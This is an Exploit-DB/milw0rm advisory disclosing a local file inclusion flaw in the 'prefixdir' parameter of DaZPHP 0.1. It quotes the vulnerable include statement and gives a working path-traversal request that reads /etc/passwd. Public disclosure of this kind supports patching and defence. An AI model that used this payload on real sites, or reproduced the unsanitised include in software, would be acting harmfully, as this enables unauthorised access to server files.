DaZPHP 0.1 - 'prefixdir' Local File Inclusion

EDB-ID:

5347


Author:

w0cker

Type:

webapps


Platform:

PHP

Date:

2008-04-02


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Script Name : DaZPHP

Download : http://sourceforge.net/project/showfiles.php?group_id=132192
Vul Code[Example] : http://[site]/[Path]/makepost.php?prefixdir=../../../../../../etc/passwd

Error : include "./".$prefixdir."/DaZPHPNews-0.1-1/makepost.php";
Greetz : Kezzap66345 - Str0ke - Dread 35

# milw0rm.com [2008-04-02]